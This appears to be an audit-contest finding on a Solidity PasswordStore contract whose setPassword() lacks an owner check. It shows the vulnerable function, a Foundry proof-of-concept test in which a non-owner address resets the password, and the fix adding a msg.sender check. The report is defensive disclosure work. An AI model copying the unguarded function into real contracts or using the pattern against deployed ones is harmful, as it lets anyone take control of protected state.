Lack of access control in setPassword()
Vulnerability Details
There is a lack of check that either the msg.sender is owner or not in setPassword().
Impact
The impact is that anybody can set the new password.
##POC
* @notice This function allows only the owner to set a new password.
* @param newPassword The new password to set.
*/
function setPassword(string memory newPassword) external {
s_password = newPassword;
emit SetNetPassword();
}
Test case
// SPDX-License-Identifier: MIT
pragma solidity 0.8.18;
import {Test, console} from "forge-std/Test.sol";
import {PasswordStore} from "../src/PasswordStore.sol";
import {DeployPasswordStore} from "../script/DeployPasswordStore.s.sol";
contract attacker is Test {
PasswordStore public passwordStore;
DeployPasswordStore public deployer;
address public owner;
function setUp() public {
deployer = new DeployPasswordStore();
passwordStore = deployer.run();
owner = msg.sender;
}
function test_non_owner_can_set_password() public {
vm.startPrank(address(1));
string memory expectedpassword = "myNewPassword1";
passwordStore.setPassword(expectedpassword);
vm.startPrank(owner);
string memory actualPassword = passwordStore.getPassword();
assertEq(actualPassword, expectedpassword);
}
}
Tools Used
Foundry
Recommendations
Add a check which ensure that the setPassword() must be called by the owner.
function setPassword(string memory newPassword) external {
require(msg.sender == s_owner);
s_password = newPassword;
emit SetNetPassword();
}
Lead Judging Commences
finding-lacking-access-control
Anyone can call `setPassword` and set a new password contrary to the intended purpose.
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.